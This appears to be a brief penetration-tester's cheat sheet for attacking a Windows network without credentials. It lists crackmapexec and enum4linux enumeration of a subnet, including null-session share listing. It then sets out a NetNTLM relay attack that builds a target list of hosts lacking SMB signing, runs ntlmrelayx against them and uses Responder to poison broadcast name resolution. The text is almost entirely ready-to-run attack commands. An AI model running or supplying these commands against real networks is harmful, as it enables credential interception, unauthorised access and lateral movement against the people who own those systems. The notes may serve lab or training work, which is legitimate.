w/o Creds
First enumeration
RHOSTS="192.168.1.0/24"
crackmapexec smb $RHOSTS
crackmapexec smb $RHOSTS -u 'a' -p '' --shares
crackmapexec rdp $RHOSTS
crackmapexec winrm $RHOSTS
crackmapexec ldap $RHOSTS
crackmapexec wmi $RHOSTS
enum4linux $RHOSTS
NetNTLM Relay
Responder will respond to any broadcast request (MDNS, LLMNR ..) and trigger authentification
ntlmrelayx will relay NetNTLMv2 auth to targets
possible targets are servers without SMB signature, cme (crackmapexec)
cme smb 192.168.0.0/24 --gen-relay-list /tmp/targets.txt
ntlmrelayx.py -smb2support --no-http-server -ip 192.168.45.208 -w -tf /tmp/targets.txt
sudo responder -I tun0 -w
You can try to force NTLM authentification